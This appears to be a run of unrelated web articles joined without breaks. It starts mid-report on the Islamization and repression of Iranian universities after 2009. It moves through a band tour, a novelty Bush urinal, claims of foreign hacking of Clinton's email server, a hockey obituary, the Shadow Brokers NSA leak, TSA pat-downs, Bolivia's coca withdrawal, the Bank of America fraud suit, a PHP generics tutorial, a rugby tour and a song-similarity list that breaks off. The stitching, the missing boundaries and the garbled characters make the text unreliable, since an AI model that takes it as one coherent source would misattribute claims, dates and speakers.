With an animated smile, they add, "But the best aspect of the social sciences was that the students weren't really into social science. Practically all of us were in various social circles or research and study groups.
"Many got depressed after the 2009 election. There was no desire or energy for work, and no student activities or assemblies were permitted. The bustling social science department was in despair.
"Some days it feels like a deathly pall hangs over the school. We can't have any type of discussions in classrooms or public spaces. Political discussion is now relegated to the school cafeteria and the rear courtyard."
Seated next to Elaheh is their friend Rosa, who studies archeology. They've known each other since high school. Rosa says, "My university education has not come close to matching my expectations."
They say that the atmosphere in their department is similar to the one described by Elaheh. The continuing constriction of scientific societies and union activities has been disheartening. "The pulse of political activities," they add, "which are an integral part of the university, practically stopped in the spring of 2010."
Stifling free expression
A wave of student support is widely held to have been responsible for carrying Mohammad Khatami to victory in the 1997 presidential race. In 2009, university students constituted much of the Green Movement's presence in the streets and a large proportion of those who were killed, injured, or incarcerated amid the protests that followed the state's announcement that Ahmadinejad had been reelected.
Over the past three years, the government has closed down Islamic student groups -- the most politically important university organizations for the past seven decades -- declared "public podiums" illegal, and banned all independent union activities in the schools. "They realize that students are the motivating engine of the Green Movement," Elaheh says.
Many university political and trade union activists have been arrested or deprived of education in the same period. According to the HRA human rights report, the 2010-11 academic year witnessed at least 52 student arrests, three cases of assembly disruption, two closures of assembly sites, two revocations of student publication permits, five cases of assault and battery, 27 judicial/security summons, 23 disciplinary committee warrants, 48 forceful separation of the sexes, 42 educational suspensions, 62 expulsions or permanent banishments, and 83 breaches of academic rights.
Science Minister Kamran Deneshjoo has pursued a policy of Islamization in the universities. In 2010, they proclaimed that campuses where students played "shameful" music and held parties, but failed to observe the commemorations for Shia martyrs, should be razed. More recently, they have pushed to limit women's participation in various fields of study.
Houman, an English student, is visiting the social sciences campus to help out with a friend's administrative issues. "There is no university life without the active participation of students and faculty in extracurricular activities unrelated to general studies and sciences," they say. The clampdown on such activities "is why the start of a new academic year doesn't augur a fresh awakening after the dormant summer."
Elaheh breaks in. "We used to look forward to student publications, but they have shut down everything. In June, near the end of the semester, Tomorrow's Dawn, a publication of the Organization of Islamic Students that had critiques of the university's day-to-day issues and of society at large, was shut down with lots of ballyhoo. Then it was The Commotion, published independently by some students, which was banned on campus by a group of students with the Basij" -- Iran's national militia, under the control of the Islamic Revolutionary Guard Corps.
The University of Tehran has been the wellspring of many student movements since the Revolution. The famous 1999 uprising of Iranian students began in its dormitories of this university. The pressure put on students and faculty here since 2009 is thus perhaps not so surprising.
There are a few dozen large universities in Tehran with student bodies in the thousands. I head south toward Imam Hussein Circle and the humanities campus of the Free University of Tehran. The grounds around its three large buildings are not nearly so well kept as the University of Tehran's.
In one of the buildings, I head to the top floors, which are assigned to graduate students. Sanaz, 25, is working on their master's thesis. "The students have no drive," they say. "There are no more any meetings organized, nothing. The girls seem to be turning to marriage and looking for a husband."
"I come here just one day a week," they continue. "Then I go straight home and don't get in touch with anyone.... I was quite active in my undergraduate years, spending most of my time on campus. But now the new students don't do anything. Even the study groups are inactive."
Freud verboten
Since summer 2009, the government has focused intensely on humanities. Officials say they are concerned that over a quarter of all students in higher education are humanities majors. According to Supreme Leader Ayatollah Ali Khamenei, "Many humanities courses lead students to lose their acceptance of divine teachings and Islam." The field of psychology, in particular, has consequently been targeted for Islamization over the past three years.
Via Skype, Mohammad Reza, who studies psychology at Bojnourd University in eastern Iran, says, "There are many areas in this field that have been completely altered with new sources, and little is discussed about Sigmund Freud, the founder of the field of psychology, or about psychoanalysis."
How has this affected them personally?
"The selection of practically uneducated people as directors of various fields of studies, solely on the basis of their connections, and similarly those on the science boards, makes a student feel that their educational rights are disrespected.  They are left with no choice. They have to accept and follow the commands of department heads, which is often injurious and delays their graduation."
Mohammad Reza feels hopeless. "When a student face all these hurdles, they are apt to lose their drive and become indifferent toward their studies. The only thing that they can imagine, if they can even afford it, is to leave the country to study somewhere else."
What is the situation like elsewhere, and in other fields of study? Sharoud is a small town about 240 miles east of Tehran. Despite its modest size, it has several universities and is full of students from cities such as Tehran and Mashhad.
Mohammad, 23, is studying engineering here, but they like photography and film. Pointing to the sealed entrance to the school's film and photo center, they say, "This was our only hope, and they closed it down too.... I came here in 2008, but the center was shut down. A few friends and I refurbished the place and we screened many films. But that was beyond their tolerance."
I ask them if they hold much hope that university life will improve. "I am not optimistic given the current conditions," they say. "I have no interest in studying any more. I just hope to be over with this last semester soon."
I walk past a lovely park, called Boustan (land of perfumes), and reach the engineering school, a noisy four-story building.
Houshang, who studies electronics, has just been accepted to graduate school in Tehran and is here to pick up their degree. "As an undergrad, it took a while for me to get interested in studying," they say. "Perhaps it was because of the large number of common units, unrelated to my concentration, that I had to take."
Common courses are similar to core curricula at American colleges. Whether you are studying petroleum engineering or nursing or electronics, you still have to pass courses like "Islamic Thought," "Islamic Ethics," "Islamic Revolutions," "Analytical History of Shiism," and so forth. Out of 120 unit credits, 21 have to be "common."
Houshang continues, "As time passed, my interest in studying rose, but because of the teachers' inability to inspire curiosity and inquisitiveness, because of deficient lab facilities and the lack of future career guidance, I never developed a strong appetite for research."
I ask them about their reasons for continuing their education. "Truthfully, I am worried about the job situation," they say. "I am studying just to pass time and keep myself busy. I'd go crazy if I was unemployed."
According to official statistics, between one and one and a half million graduates enter the job market annually. Government data from 2009 shows that 45 percent of the unemployed hold at least a college degree. While officials have demonstrated little interest in updating such data, several independent studies show that employment uncertainty after graduation is dampening students' aspirations. The demoralizing impact appears to be evidenced by a noticeable drop in academic achievement.
"Abattoirs on any given day"
My last visit on this tour is to the pharmacology school of Ferdowsi University in Mashhad, Iran's second largest city.
As I enter, the grounds are racked by the din of drills and hammers. A new building is going up right in front of the main tower and every corner of the campus is under renovation.
I speak with Golareh, 24, at the entrance to one of the labs, asking them to tell me about the political and academic atmosphere at the school. "Although the academic situation is not so energized or active, it is still acceptable," they reply. "But the political milieu of the school has been dead since 2009. The board of the Fortification of Unity [an Islamic student group] was shut down and in its place are several Basiji boards. There are no publications and no activist student groups exist. If there are any political discussions, they are organized by the Basijis."
I strike up a conversation with Arash nearby. They ranked near the top among the tens of thousands who took the state university entrance exam, the concours, a few years back. "Last week I watched the announcement of this year's successful candidates on TV," they say. "Just before announcing the candidates, they placed a surprise call to the top student's home. If I was that person's parents, I wouldn't be so happy. Our scientific geniuses end up at the big universities in Tehran where they face serious dangers. That evening [three years ago] after the results were announced, the dorms at the University of Tehran were attacked and many of these brilliant minds who had gotten in with the highest ranks were killed or injured, arrested, expelled or banished from education for life. Now, should any new students' parents' celebrate that their children have achieved those high ranks in the tests?"
Arash is recalling the unprovoked attack on the student residence halls on the evening after the election results were announced in June 2009. Plainclothes security officers and police officers attacked with percussion grenades, tear gas, and automatic weapons. They killed five students and detained scores, many of whom were subsequently tortured while in prison.
Arash concludes, "Setting aside the once vigorous and ebullient atmosphere of the schools on the one hand and their Islamization on the other, the main question remains of how the universities can become human abattoirs on any given day."
Photo: Students returning to classes at Towhid High School.
Copyright © 2012 Tehran Bureau
@TehranBureau | TB on Facebook
Enter Shikari have announced a North American tour in support of their new album, The Spark.
The tour kicks off next January with support from UK punks Milk Teeth.
Read more: How David Bowie inspired Enter Shikari's upcoming new album
The band's fifth studio album is Shikari's most melodic and personal album to date, and it's meant to be a record for everyone who's filled with frustration at the troubles going on in the world around us—but hasn't lost the capacity for hope.
“The spark is a new connection, a new beginning,” frontman Rou Reynolds says. “It can be short and insignificant, but it can create something so significant. The spark is that light at the end of the tunnel—when everything seems to be falling apart, but you're able to see some sort of path out of the dark.”
In the U.S., The Spark debuted at No. 22 on Billboard's Current Alternative Album Chart.
Tickets go on sale Friday, Oct. 6 at 12:00 p.m. local time.
��������2018
+ @MILKTEETHPUNX + TBA.
ticket on sale FRIDAY. MIDDAY (local time).
(see our Facebook post for venues list)> pic.twitter.com/T1EdwBgooN — ENTER SHIKARI (@ENTERSHIKARI) October 3, 2017
Dates:
1/19 – Austin, TX @ The Mohawk
1/20 – Dallas, TX @ Tree's
1/22 – Orlando, FL @ The Social
1/23 – Ft. Lauderdale, FL @ Culture Room
1/25 – Atlanta, GA @ Terminal West
1/26 – Raleigh, NC @ Cat's Cradle
1/27 – Richmond, VA @ Capital Ale House
1/28 – Washington, DC @ 9:30 Club
1/30 – Boston, MA @ The Sinclair
2/2 – Brooklyn, NY @ Music Hall of Williamsburg
2/3 – Philadelphia, PA @ Union Transfer
2/5 – Montreal, QC @ Theatre Fairmount
2/6 – Toronto, ON @ Lee's Palace
2/8 – Columbus, OH @ A&R Music Hall
2/9 – Chicago, IL @ Metro
2/10 – St Paul, MN @ Amsterdam Hall
2/11 – Winnipeg, MB @ The Pyramid Cabaret
2/13 – Calgary, AB @ Commonwealth
2/14 – Edmonton, AB @ Starlite Ballroom
2/16 – Vancouver, BC @ Imperial
2/17 – Seattle, WA @ Neumo's
2/18 – Portland, OR @ Hawthorne Theater
2/20 – Santa Cruz, CA @ Catalyst Atrium
2/23 – Los Angeles, CA @ El Rey Theatre
2/24 – Santa Ana, CA @ The Observatory
2/25 – San Diego, CA @ The Irenic
2/27 – Phoenix, AZ @ Crescent Ballroom
Where will you be catching Enter Shikari on tour? Let us know in the comments below!
Watch more: Note To Self: ENTER SHIKARI
Clark Sorensen, famed floral urinal designer, has apparently gone political! He's made a Presidential Urinal, the likeness of George W. himself!
Sorensen, who will have a sneak pee-view of George at their San Francisco studio on election night, says they designed the Presidential Toilet so that they could express their appreciation for the last eight years. Visitors to their studio on election eve will be encouraged to give the urinal what it deserves -- "A Good Flush!"
Following the sneak pee-k at their studio, Sorensen will have a one-man show entitled "Down The Drain - The Legacy of George W. Bush." at Ruby's Clay Studio and Gallery in San Francisco. The show will run from January 17 to February 16, 2009.
For more information, visit ClarkMade. If you would like to attend the sneak pee-k, get a reservation by emailing them at clark@clarkmade.com.
See more of Sorensen's Urinals in my former column: 10 Fun Ways To Piss On A Flower.
Well, what do you think? Creative way to express an opinion or a new low in the political dialogue?
As election day draws near, accusations against both US presidential candidates are becoming more and more brutal, with Fox News reporting the FBI believes up to five foreign intelligence agencies managed to hack into Hillary Clinton's private email server.
According to the report, there is about a 99 percent chance that the server used by then-Secretary of State Clinton for work communications in violation of security protocols was compromised. The allegations were confirmed by House Homeland Security Committee Chairman Michael McCaul, who said that FBI director James Comey had told them about the exposure previously.
“She exposed [information] to our enemies,” the Republican representative from Texas said on “Fox & Friends” on Thursday morning. “Our adversaries have this very sensitive information… In my opinion, quite frankly, it's treason.”
Read more
McCaul added that there are concerns not only about the content of the emails, but also access to the communication protocols of special access programs used on government-issued electronic devices.
“Now countries like Russia and China and Iran have the most highly-sensitive programs in the United States. And the President of the US is communicating with them,” they alleged. “They are not stupid. They can figure that out as well.”
McCaul has said earlier that they have been briefing Republican candidate Donald Trump on security issues.
Director Comey previously hinted at the possibility that foreign nations had hacked into Clinton's server, but the Democrat candidate pushed back, saying the FBI director was “speculating.”
The new accusations come after the FBI relaunched an investigation into the use of Clinton's private server after discovering additional emails on the laptop of ex-Representative Anthony Weiner in the course of a separate investigation. Weiner's electronic devices, as well as those belonging to their wife, senior Clinton aide Huma Abedin, were seized during that probe.
READ MORE: FBI reopens Clinton investigation as new emails found ‒ Comey
After the bombshell that investigation was being reopened dropped last week, some Democrats accused the FBI director of trying to influence the election.
Some sad news to pass along for fans of St. Louis Blues hockey.
Former player Rik Wilson has died at age 53.
“Our prayers and thoughts are with the Wilson family with the passing of Blues Alumni Rik Wilson,” a Twitter post from the Blues alumni page reads.
The Blues selected Wilson with the 12th overall pick in the 1980 NHL Draft. A defenseman, they played from 1981-1988 with St. Louis, Calgary, and Chicago before retiring. Wilson spent five seasons in St. Louis, appearing in 235 regular season games and 22 postseason games with the Blues.
Below is a statement issued by the St. Louis Blues:
“The St. Louis Blues and the Blues Alumni organization are deeply saddened by the passing of Rik Wilson. Rik donned the Blue Note with pride and passion during five of their six NHL seasons. They were a valued member of not only the Blues organization but the St. Louis community, where Rik and their family settled following their retirement. Our thoughts and prayers are with the Wilson family during this difficult time.”
(TM and Copyright 2016 CBS Radio Inc. and its relevant subsidiaries. CBS RADIO and EYE Logo TM and Copyright 2016 CBS Broadcasting Inc. Used under license. All Rights Reserved. This material may not be published, broadcast, rewritten, or redistributed.)
Follow us on Twitter | Like us on Facebook
A reported breach at the National Security Agency has been described as "catastrophic" and even worse than Edward Snowden's massive data leak. The New York Times reports a group called the Shadow Brokers has been releasing information on NSA cyberweapons since August 2016.
It's now being used against the United States.
The Times reports the government does not know if the secrets were leaked or hacked or whether the possible leaker is still at work.
"We don't know what else the leakers may have, and most important... we don't know how this information got out of the National Security Agency. And that's 15 months after the first leak occurred," CBS News senior national security contributor Michael Morell said Monday on "CBS This Morning." "That's what's most scary to me because that says we don't know the totality of this, and more important, we don't know if they're stealing information as we sit here right now."
Morell, a former deputy and acting director of the CIA, agreed that this could be worse than the Snowden leak "because [Snowden] leaked descriptions of these tools. These are the actual tools themselves." Morell said the tools are used "to collect intelligence on our adversaries to protect the country."
"We've now made that much more difficult to collect that intelligence that's so important," Morell said.
While Morell said some are pointing fingers at Russia, he's not so sure.
"If Russia had access to NSA in terms of cyber, internet access, or in terms of an insider, why would they go public and give that up? I tend to think this is either a disgruntled insider or an outside group," Morell said.
Watch the video above to see why Morell thinks President Trump is "gullible to being manipulated" by Russian President Vladimir Putin and why the U.S. is "the big loser" after Mr. Trump withdrew from the Trans-Pacific Partnership trade agreement.
By Jack Minor
With the holidays fast approaching, the Transportation Safety Agency Security Administration has announced new security procedures requiring passengers selected for secondary screening to go through a machine that produces a full body scan producing a nude but grainy, black and white image. Passengers choosing to opt out of the scan will face a full body pat.
The head of Homeland Security has indicated the government is considering the request of an Islamic organization that has suggested Muslim women be allowed to pat themselves down during a full body search that is part of new enhanced procedures at airports.
Since implementing the procedures, numerous complaints have arisen that the search is not a “pat-down” but rather feeling and grabbing along a person's genitalia and other areas until they meet resistance. Critics have said the pat-downs would be considered sexual assault if performed elsewhere.
The TSA defends the procedures as necessary in light of last years “underwear bomber” and the recent issues involving printer cartridges being used in an attempt to blow up cargo planes.
The Council on American-Islamic Relations, CAIR, has expressed concern with the TSA over the regulations and recommended special procedures for dealing with Muslim women. The organization issued a travel advisory for Muslims over the procedure.
In the advisory CAIR advises all Muslims to contact them and file a complaint with the TSA if they experience any “disturbing incidents” with the new procedures and they feel they have been unfairly singled out for screening.
It goes on to make special recommendations for Muslim women wearing a hijab covering their face. The advisory says women are to inform the officer they are only to pat down the head and neck and says “They should not subject you to a full-body or partial body pat-down.” They also recommend that women should be permitted to pat themselves down and “have the officers perform a chemical swipe of your hands.”
Barack Obama's Homeland Security Czar, Janet Napolitano, is considering changes to the procedures to address the issues raised by CAIR.
Since announcing the rules, several organizations have expressed concern over the procedures. Pilots and flight crews have expressed concern about constant exposure to the low level radiation generated by the machine, but the government denies any danger from having the scan done. The U.S. Airline Pilots Association has issued instructions to members to call in sick and not board a flight if they are too upset to fly after a pat-down. The Allied Pilots Association has urged members to boycott the body imaging machines.
At least one website has recommended Americans boycott the body scans by recommending everyone chosen for additional screening on Nov. 24 to opt out of the body scans and choose the pat down. Some have expressed alarm over the recommendation saying it could slow down or halt the security process on the day before Thanksgiving.
New Jersey lawmakers have pending resolutions demanding Congress tell the TSA that people must not be forced to give up their fourth amendment rights when they choose to travel by airline.
A Reuters poll asking if individuals were less likely to fly as a result of the new procedures revealed 96 percent of respondents affirming they would make alternate travel plans to avoid intrusive security and pat-downs.
John Whitehead, president of the Rutherford Institute, said the regulations came straight from the President himself.
In a recent commentary Whitehead said “legislation has been proposed to mandate full-body scanners and make them the primary screening method in all U.S. airports by 2013, but Congress has yet to act on it. So we can thank Barack Obama for this frontal assault on our Fourth Amendment rights.” They went on to say “Yet in the wake of the bumbling underwear bomber's botched Christmas Day attempt to blow up a Detroit-bound plane, Obama directed the Homeland Security Department to acquire $1 billion in advanced-technology equipment, including body scanners, for screening passengers at airports.”
The machines have been purchased from California based Rapiscan Systems. The company is a client of the Chertoff Group, a security consulting agency headed by former Homeland Security Secretary Michael Chertoff who has lobbied for the need for installing the machines in airports.
Share on Facebook
The Bolivian legislature has approved a Bill of Complaint filed by President Evo Morales' government to withdraw Bolivia from the 1961 Single Convention on Narcotic Drugs in 2012 over its prohibition personal use, consumption, possession or cultivation of the native coca leaf.
In support of the measure, the government cited Article 384 of the Bolivian Constitution passed in 2008, which obligates the State to protect use of the coca leaf as a part of Bolivia's ancestral cultural heritage and rejects the designation of coca in its natural state as a narcotic.
“It's important to make this complaint for our people to continue practicing their culture,” said Foreign Minister David Choquehuanca following passage of the bill.
Bolivia has consistently called for change to the 1961 Convention since 2009. That year, it began a process to amend Article 49 of the Convention, which prohibited consumption of the coca leaf 25 years after passage of the Convention beginning in 2001. Its proposal for amendment was formally opposed by 17 other Convention signatories, including the United States, U.K., France, Japan, and Russia.
While major Western governments have long had no difficulty outlawing this indigenous regional practice, other governments have not been as supportive. The Chinese government has compared a ban on chewing coca in Bolivia to a ban on drinking tea in China.
Protection of traditional coca leaf-chewing, which dates back in the Andes over 3000 years, has been a priority for President Morales, who rose to prominence in Bolivia after leading a coalition of coca growers defending their right to grow the crop against U.S.-led eradication efforts. Although the UN Convention treats the coca leaf and processed cocaine the same, Morales and supporters of traditional coca growing reject the classification of the coca leaf as a narcotic with the popular campaign slogan, “Coca sí! Cocaína no!”
Andean communities have chewed coca for personal use and for public health purposes, citing traditional medicinal applications for the relief of gastrointestinal problems, respiratory ailments, and altitude sickness. A U.S.-blocked World Health Organization report in 1995 echoed these findings.
Bolivia's withdrawal from the 1961 Convention, so long as it's filed with the UN Secretary-General by July 1, 2011, will take effect beginning in January 2012. Although Bolivia's formal complaint over the coca leaf ban will technically withdraw it from Convention compliance beginning in 2012, Bolivia has stated it voluntarily intends to continue complying with the drug trafficking and narcotics control sections of the Convention.
The Bolivian government has publicly stated its support for developing a legal global market for coca products, including coca-based tea, soft drinks and pharmaceuticals, which it argues would reduce demand for cocaine.
Yesterday, New York Attorney General Andrew Cuomo filed a lawsuit against Bank of America, its former Chairman Ken Lewis and CFO Joseph L. Price on civil fraud charges, alleging that they hid information from shareholders about large losses at the investment firm Merrill Lynch, which BofA picked up in a merger, and that they lied to the federal government in order to secure a bailout to cover the losses. If you get a moment, read the summary to the lawsuit. It really does show Bank of America as, in the words of the summary, “a classic example of how the modus operandi of our nation's largest financial institutions led to the near collapse of our financial system.”
The story is pretty simple: BofA bought Merrill Lynch and never told shareholders about the financial sickness at the heart of the firm. Then, after the purchase, BofA essentially played a game of chicken with the Feds, threatening to back out unless they got a sweetheart deal, even though there was no such clause in the merger agreement that would account for an opt-out. Here's just a taste of how the world works when you're a successful American bank:
Thus, Bank management sought taxpayer aid on the basis of actual losses only $1.4 billion more than losses they had deemed unnecessary to disclose to their shareholders, at a time when the shareholders were deciding whether to buy the company generating those losses. The undisclosed losses were enough to ruin the combined entity, as management demonstrated by going to the government for a taxpayer bailout, and would have done so without that bailout. Having failed in their disclosure obligations, the Bank's management went on to misrepresent its position to the federal government in negotiations for taxpayer aid. Bank management pretended to the government that it believed it had a viable MAC (merger agreement clause) claim and that it would seek to exit the merger, or that it would try to renegotiate the purchase price. After the fact, in testimony before this Office and elsewhere, Lewis claimed that this position only changed after the government instructed the Bank not to invoke the MAC clause or renegotiate, but instead to take taxpayer aid in return for completing the merger. Lewis claimed, in effect, that they had been strong-armed by the government. This account is belied by the facts uncovered by this Office. Contrary to Lewis' after-the-fact account, the evidence shows that the Bank never intended either to renegotiate or to terminate the merger using the MAC clause. In fact, the Bank's management knew almost immediately upon conferring with its outside lawyers that renegotiation was impossible, because it meant going back to the shareholders, and public knowledge of the endangered deal would likely destroy Merrill. Likewise, the Bank was informed by its outside lawyers that invoking the MAC clause would likely prove a futile exercise that could destroy the Bank […] The Bank's plan worked, and it received the taxpayer aid, in an amount exceeding $20 billion, on top of $10 billion already committed prior to the December negotiations, for a total of approximately $30 billion in aid. As a result, the merger closed as planned on January 1.
(Bank of) America, fuck yeah!
Lewis' lawyers, in particular, are calling the lawsuit misguided, but the AG spells out a pretty solid case. Just because Cuomo is going after something that was probably standard practice doesn't mean it was legal. Lewis' case amounts to “my lawyers told me not to disclose to shareholders,” hardly a defense. But Lewis clearly doesn't feel like going down alone.
In defending former Bank of America CEO Ken Lewis against charges that they misled investors, their lawyers will call as witnesses former Treasury Secretary Hank Paulson and the current Federal Reserve Chairman Ben Bernanke, according to people close to the matter. The defense team, led by former U.S. Attorney Mary Jo White, hopes to get Paulson and Bernanke to reveal that Lewis did not mislead the government about BofA's deteriorating financial condition in the aftermath of its Merrill Lynch deal. Those losses prompted a massive government bailout. White's first order of business is to get the civil case dismissed, according to several sources. But if she's unsuccessful, they plan a vigorous defense, including calling high-level government officials to testify. “If this thing goes to trial you can expect both Paulson and Bernanke to be on the witness list,” said one person close to the defense team, “and right now Lewis doesn't want to settle.”
Now that could be worth watching. Bernanke and Paulson would specifically be called to testify, presumably, about whether or not Lewis was lying to them about backing out of the Merrill deal in order to secure a bailout. That's a crevice, actually, that the AG could use to explore a whole host of crimes on Wall Street.
Stay tuned.
If you enjoy reading my blog, you could consider supporting me on Patreon .
« back — written by Brent on May 17, 2017
PHP Generics and why we need them
In today's blog post we'll explore some common problems with arrays in PHP. All the problems and issues listed could be solved with a pending RFC which adds generics to PHP. We won't explore in too much detail what generics are. But at the end of this read you should have a good idea as to why they are useful, and why we really want them in PHP. So without further ado, lets dive into the subject.
Imagine you have a collection of blog posts, loaded from a data source.
$posts = $blogModel->find();
Now you want to loop over every post, and do something with its data; lets say, the id .
foreach ($posts as $post) { $id = $post->getId(); }
This is a scenario that happens often. And it's this scenario we'll explore to discuss why generics are awesome, and why the PHP community desperately needs them.
Lets take a look at the problems of the above approach.
# Data integrity
In PHP, an array is a collection of.. things.
$posts = [ 'foo' , null , self ::BAR, new Post( 'Lorem' ), ];
Looping over this set of posts would result in a fatal error.
PHP Fatal error: Uncaught Error: Call to a member function getId() on string
We're calling ->getId() on the string 'foo' . Not done. When looping over an array, we want to be sure that every value is of a certain type. We could do something like this.
foreach ($posts as $post) { if (!$post instanceof Post) { continue ; } $id = $post->getId(); }
This would work, but if you've written some production PHP code, you know these checks can grow quickly, and pollute the codebase. In our example, we could verify the type of each entry in the ->find() method on $blogModel . However, that's just moving the problem from one place to another. It's a bit better though.
There's another problem with data integrity. Say you have a method which requires an array of Posts .
function handlePosts (array $posts) { foreach ($posts as $post) { } }
Again, we could add extra checks in this loop, but we could not guarantee that $posts only holds a collection of Posts .
As of PHP 7.0, you could use the ... operator to work around this issue.
function handlePosts (Post ...$posts) { foreach ($posts as $post) { } }
But the downside of this approach: you would have to call the function with an unpacked array.
handlePosts(...$posts);
You can imagine it's better to know beforehand whether an array contains only elements of a certain type, rather then manually checking the types within a loop, every, single, time.
We can't do benchmarks on generics, because they don't exist yet, so its only guessing as to how they would impact performance. It's not insane to assume though, that PHP's optimised behaviour, written in C; is a better way to solve the problem than to write lots of userland code.
This is where the ad would go. I get it, they are stupid. But to be honest, they actually make a difference. So maybe you'd consider whitelisting this blog or support me on Patreon?
# Code completion
I don't know about you, but I use an IDE when writing PHP code. Code completion increases productivity immensely, so I'd also like to use it here. When looping over posts, we want our IDE to know each $post is an instance of Post . Lets take a look at the plain PHP implementation.
public function find () : array { }
As of PHP 7.0, return types were added, and in PHP 7.1 they were refined with nullables and void. But there's no way our IDE can know what's in the array. So we're falling back to PHPDoc.
public function find () : array { }
When using a "generic" implementation of eg. a model class, type hinting the ->find() method might not be possible. So we're stuck with type hinting the $posts variable, in our code.
$posts = $blogModel->find();
Both the uncertainty of what's exactly in an array, the performance and maintenance impact because of scattered code, and the inconvenience when writing those extra checks, makes me long for a better solution.
That solution, in my opinion is generics. I won't explain in detail what generics do, you can read the RFC to know that. But I will give you an example of how generics could solve these issues, guaranteeing the developer would always have the correct data in a collection.
Big note: generics do not exist in PHP, yet. The RFC targeted PHP 7.1, and has no further information about the future. The following code is based on the the Iterator interface and the ArrayAccess interface, which both exist as of PHP 5.0. At the end, we'll dive into a generics example, which is dummy code.
First we'll create a Collection class which works in PHP 5.0+. This class implements Iterator to be able to loop over its items, and ArrayAccess to be able to use array-like syntax to add and access items in the collection.
class Collection implements Iterator , ArrayAccess { private $position; private $array = []; public function __construct () { $this ->position = 0 ; } public function current () { return $this ->array[ $this ->position]; } public function next () { ++ $this ->position; } public function key () { return $this ->position; } public function valid () { return isset ( $this ->array[ $this ->position]); } public function rewind () { $this ->position = 0 ; } public function offsetExists ($offset) { return isset ( $this ->array[$offset]); } public function offsetGet ($offset) { return isset ( $this ->array[$offset]) ? $this ->array[$offset] : null ; } public function offsetSet ($offset, $value) { if (is_null($offset)) { $this ->array[] = $value; } else { $this ->array[$offset] = $value; } } public function offsetUnset ($offset) { unset ( $this ->array[$offset]); } }
Now we can use the class like this.
$collection = new Collection(); $collection[] = new Post( 1 ); foreach ($collection as $item) { echo "{$item->getId()}
" ; }
Note that again, there's no guarantee that $collection only holds Posts . Adding eg. a string would work fine, but would break our loop.
$collection[] = 'abc' ; foreach ($collection as $item) { echo "{$item->getId()}
" ; }
With PHP as it is now, we could fix this problem by creating a PostCollection class. Note that I'm using nullable return types, only available as of PHP 7.1.
class PostCollection extends Collection { public function current () : ? Post { return parent ::current(); } public function offsetGet ($offset) : ? Post { return parent ::offsetGet($offset); } public function offsetSet ($offset, $value) { if (!$value instanceof Post) { throw new InvalidArgumentException( "value must be instanced of Post." ); } parent ::offsetSet($offset, $value); } }
Now only Posts can be added to our collection.
$collection = new PostCollection(); $collection[] = new Post( 1 ); $collection[] = 'abc' ; foreach ($collection as $item) { echo "{$item->getId()}
" ; }
It works! Even without generics! There's only one issue, you might be able to guess it. This is not scalable. You need a separate implementation for every type of collection, even though the only difference between those classes would be the type.
You could probably make the subclasses even more convenient to create, by "abusing" late static binding and PHP's reflection API. But you'd still need to create a class, for every type available.
# Glorious generics
With all that in mind, lets just take a look at the code we would be able to write if generics were implemented in PHP. This would be one class which could be used for every type. For your convenience, I'll only be writing the changes compared to the previous Collection class, so keep that in mind.
class GenericCollection < T > implements Iterator , ArrayAccess { public function current () : ? T { return $this ->array[ $this ->position]; } public function offsetGet ($offset) : ? T { return isset ( $this ->array[$offset]) ? $this ->array[$offset] : null ; } public function offsetSet ($offset, $value) { if (!$value instanceof T) { throw new InvalidArgumentException( "value must be instanced of {T}." ); } if (is_null($offset)) { $this ->array[] = $value; } else { $this ->array[$offset] = $value; } } }
$collection = new GenericCollection<Post>(); $collection[] = new Post( 1 ); $collection[] = 'abc' ; foreach ($collection as $item) { echo "{$item->getId()}
" ; }
And that's it! We're using <T> as a dynamic type, which can be checked before runtime. And again, the GenericCollection class would be usable for every type, always.
If you're as excited as me for generics (and this is only the tip of the iceberg by the way), you should spread the word in the PHP community, and share the RFC: https://wiki.php.net/rfc/generics
05 May 2017, 10:49
England Counties to tour Spain at end of May
Will play a Basque Country team as well as Spain
Bill Beaumont County Championship starts on Saturday
England Counties will complete a two-match tour of Spain from 29 May to 4 June, and team manager Matt Long is expecting a tough test.
Counties are set to face a Basque Country team in San Sebastian on Wednesday, 31 May before travelling to Guadalajara three days later to take on Spain, and Long is wary of the challenge ahead.
“I'm expecting a very physical game,” they said of the international clash. “Given we wanted a full Test against the international side, I think we'll get one.
“We've done a bit of research, and we know Spain are improving, their world ranking is proof of that. We're going to have a hard test.”
Counties are unbeaten so far in 2017 having recorded wins over Scotland Club XV and Ireland Club XV, running out 45-28 and 34-26 winners respectively, and Long attributes those triumphs to getting the right mix of players together.
Full time: @EnglandCounties 45-28 Scotland Clubs. A very entertaining second half pic.twitter.com/ciAFItHrzP — The Lone Blazer (@Andrew_Sarek) February 24, 2017
“From Nothumberland to Cornwall, we like to make sure we get a fair representation of players across the board,” they said.
And with the Bill Beaumont County Championship getting underway this weekend, Long admits they and their team will try to pick those involved.
“We are reviewing every single aspect of eligible players as part of the county championships over the next four weeks to get a good mix of players from throughout the whole country,” they added.
“We will have a band of selectors and coaches at the matches, and I'll be liaising with people watching different games so that we strike the correct balance.”
Counties will fly to Spain the day after the county championship final at Twickenham Stadium, and Long explains there will be no meet and greet beforehand, rather their side will have to gel and search for consistency from the outset.
They added: “We expect that both the Basque Country team and Spain will want to play a quick game, and we must adapt to that accordingly.”
There's no doubt that Sam Smith's “Stay With Me” bears some resemblance to Tom Petty's hit “I Won't Back Down.” But the history of pop music is full of such similarities, and only some of those end up with songwriting settlements. This list—part one of two, with the other half publishing tomorrow—explores some songs that sound just as similar as “I Won't Back Down” and “Stay With Me.” Some of them led to judgments, others were simply acknowledged or ignored.
1. Chuck Berry, “Sweet Little Sixteen” (1958) and The Beach Boys, “Surfin' U.S.A.” (1963)
The Beach Boys' “Surfin' U.S.A.” isn't so much an homage to Chuck Berry's “Sweet Little Sixteen” as it is a rewrite, with essentially the same music and some new lyrics. Sure, the Boys' hook is much bigger (“Everybody's gone surfin' / Surfin U.S.A.”), but it's Berry's song—his publishing company was given the entire monetary, though various “Surfin' U.S.A.” releases have credited Brian Wilson, Berry, and both. [Josh Modell]
Advertisement
2. The Chiffons, “He's So Fine” (1962) and George Harrison, “My Sweet Lord” (1970)
“My Sweet Lord” is one of copyright law's greatest hits, having sparked one of music history's most infamous court battles over its similarities to “He's So Fine.” Both songs are built on the same pair of musical phrases, which are sequenced in such a unique way even Harrison's expert witness admitted how uncommon it was. Harrison later attributed their transgression to “subconscious plagiarism,” and a judge awarded Bright Tunes Music over $1.5 million, though that was cut by two-thirds in subsequent appeals. In addition to the legal win, The Chiffons also made the better song, thanks to the “doo-lang” refrain. [Joshua Alston]
Advertisement
3. Beyoncé, “Halo” (2008) and Kelly Clarkson, “Already Gone” (2009)
